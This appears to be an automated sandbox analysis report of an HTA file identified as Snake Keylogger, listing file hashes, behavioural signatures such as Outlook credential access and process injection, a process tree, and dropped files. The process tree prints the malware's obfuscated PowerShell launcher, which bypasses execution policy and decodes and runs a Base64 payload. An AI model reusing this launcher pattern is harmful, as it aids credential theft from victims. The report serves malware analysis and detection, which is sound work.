Analysis

  • max time kernel
    117s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    07-10-2024 01:54

General

  • Target

    bdae25f01110b01f248c854d1ee715aa77d00342a7db6fe5cc06e085c07dfbef.hta

  • Size

    150KB

  • MD5

    25a0a6e379daa9cb5c68307fbf0857ea

  • SHA1

    4c672a33a46b32584f00868c4b98d10187a91c3c

  • SHA256

    bdae25f01110b01f248c854d1ee715aa77d00342a7db6fe5cc06e085c07dfbef

  • SHA512

    fb0bb7232df274cc07e30ec425e891e40cc105469e2aaf0f0d3843199c605f910a74690195a08ed1b269725ff13a48b927585d0f98a655743b0484ea8f652ee7

  • SSDEEP

    48:7oa+ahWjz7eWLB2L64UKB3Rns4wKB3RnFWhWYYeecSr99DdokZGStBw04v4U1QYx:Ea+Cw7W3FNYfqffZUgAVT

Malware Config

Extracted

Family

snakekeylogger

Credentials

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\bdae25f01110b01f248c854d1ee715aa77d00342a7db6fe5cc06e085c07dfbef.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2272
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c pOweRShELl -eX ByPass -nOp -W 1 -C dEviCECreDENTIalDEpLoyMeNt ; ieX($(Iex('[sySTeM.texT.eNcOdiNg]'+[cHar]58+[cHaR]58+'uTF8.gEtStrInG([sYstEm.COnvErt]'+[CHAR]58+[CHAR]0x3a+'FRoMBaSe64sTRINg('+[Char]34+'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'+[CHAR]0x22+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2940
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        pOweRShELl -eX ByPass -nOp -W 1 -C dEviCECreDENTIalDEpLoyMeNt ; ieX($(Iex('[sySTeM.texT.eNcOdiNg]'+[cHar]58+[cHaR]58+'uTF8.gEtStrInG([sYstEm.COnvErt]'+[CHAR]58+[CHAR]0x3a+'FRoMBaSe64sTRINg('+[Char]34+'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'+[CHAR]0x22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2472
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jtk9sg2l.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2504
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC5B0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC5AF.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2676
        • C:\Users\Admin\AppData\Roaming\taskhostw.exe
          "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:2844
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
            5⤵
            • Accesses Microsoft Outlook profiles
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:2636

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RESC5B0.tmp

    Filesize

    1KB

    MD5

    b6ebb62625fd54d906c7d0787fa0e0ae

    SHA1

    317d51f4b05b0ae8a5ba21d9c323167bf83e8cf1

    SHA256

    ac91467226bfcc7ec199f4509b9bad99f02f05d46d839b990d84a8ede3d44060

    SHA512

    4f3060b3b27ab9cd43bd4377892e0d4fcf1cc0fb2804519ab76790b563014038e6451ae09af3795276e987790cc054aead8d11a5a82b71c2910f8f80b1c4a947

  • C:\Users\Admin\AppData\Local\Temp\jtk9sg2l.dll

    Filesize

    3KB

    MD5

    4309a3ed19f70034ccf41f7ea7f6e35c

    SHA1

    b34ebe8ef85436cf21e3d77b1e673ed9d9c2a118

    SHA256

    e28f8fc744a9c323b659a4b433a4e51622375795a7ad90235e4e954d8c0ef80d

    SHA512

    49da216fcc424ac327737e7ffbb578c005d7f91be04f3a7ed6d29c3d0282335c21eeb7e8995b68859b21b077099e9e530f3707f6e3e056b43ed7ff274df0f479

  • C:\Users\Admin\AppData\Local\Temp\jtk9sg2l.pdb

    Filesize

    7KB

    MD5

    034606a291399b39dac22939615faa33

    SHA1

    77b7f601b948b5b92cea5c739068b79d0bab5e4f

    SHA256

    4fc9cfa3d949b5e03737cfbad4a72db283f29cf7027426d4fb406c7e77afc775

    SHA512

    fe5f4a3fe3a3d0967340acb222fd3a159ec5d1469313b8fd7ab1177b14ad72f204c16992fc81225d04f4d092b2fff58c9a06a67bf0d228664affe045f4200fb7

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCC5AF.tmp

    Filesize

    652B

    MD5

    6502f1e6421fba6da9bc1f2cb505750f

    SHA1

    aa3695363fae491f66b17474abb65dd2f30dc6f7

    SHA256

    a1569e2acc0791066089c9b0a28f1f67c5e893fbb9cddf5c2319d208b0d93094

    SHA512

    0d6ed21bcf96343d1e722267a297e3e050fb563c61511b63a0c76a75caa61bdcb0da79d23d19db4bf3b39176078d86e97d599e30d3f3cf5da99526900782d532

  • \??\c:\Users\Admin\AppData\Local\Temp\jtk9sg2l.0.cs

    Filesize

    477B

    MD5

    3c2b912e8118e7163d3d05a557f13d2f

    SHA1

    8889f87c11a2fca2b363c3064d317447a29c5498

    SHA256

    822f2e3e97f3d3f1d6a78969a3b8e502a2dd611a0bb9e1abccfd94f6faa22852

    SHA512

    7aeb33879a1c6a8a639e65e4dab9076d2c0c03bb65e2883c342d35b3ae3cbcda8dc6158da09ded5d908193af173cb4c34014b0055b13c1ed9be74fb3fe896499

  • \??\c:\Users\Admin\AppData\Local\Temp\jtk9sg2l.cmdline

    Filesize

    309B

    MD5

    243a99ee64772f6fcb34f92dbca5c43a

    SHA1

    6945fbceb92c05b80be6a8623ece41cc76d3b7be

    SHA256

    b00823537cc8ae7af8903d172aca140a8ba5476bf031650c0af4c6242fc84839

    SHA512

    95f3409c5a7fd5ff3c060a391ddda30dcd3dbe7aaafa28a4d7f0f3dbc2ee6e375f251a190c14bc313ad2047910f03cb2e5799ecc79cb6186381e1a0d8f911f39

  • \Users\Admin\AppData\Roaming\taskhostw.exe

    Filesize

    931KB

    MD5

    58ff14d476f2bbaab31b12587c09559e

    SHA1

    ea9c7ce65a67f2a2d4e1ca4a2c3ac6785021fc94

    SHA256

    1640e87780b219eba703c734e68b0f5cf793bc94fe0cdf9121658d12bb1f9364

    SHA512

    a75d4bd80620a9441783131812780397fb0c3b1c6d6b9147d65ece23d9cc9384c148f6c491794cfbc012c290e3266e06a76357b84141b843929a295c2649613a

  • memory/2636-29-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/2636-31-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/2636-30-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB